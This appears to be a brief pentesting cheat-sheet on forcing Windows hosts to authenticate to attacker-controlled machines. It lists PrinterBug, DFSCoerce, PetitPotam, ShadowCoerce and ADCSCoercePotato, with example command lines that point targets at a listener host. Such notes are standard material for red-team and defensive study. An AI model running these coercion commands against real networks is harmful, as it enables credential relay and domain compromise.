Coercing
Printerbug.py
Triggers RPC call using SpoolService bug.
[[domain/]username[:password]@]<targetName> attackerhost
python3 printerbug.py CORP.local/[email protected] 192.168.102.1DFS Coerce (MS-DFSNM)
MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot
python3 dfscoerce.py -u Joe -d CORP.local 192.168.101.1 192.168.102.1PetitPotam (MS-EFSRPC)
Coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw
//ShadowCoerce (MS-FSRVP)
MS-FSRVP coercion abuse
python3 shadowcoerce.py -d "domain" -u "user" -p "password" LISTENER TARGETADCSCoercePotato
Yet another technique for coercing machine authentication but specific for ADCS server
Links
Last updated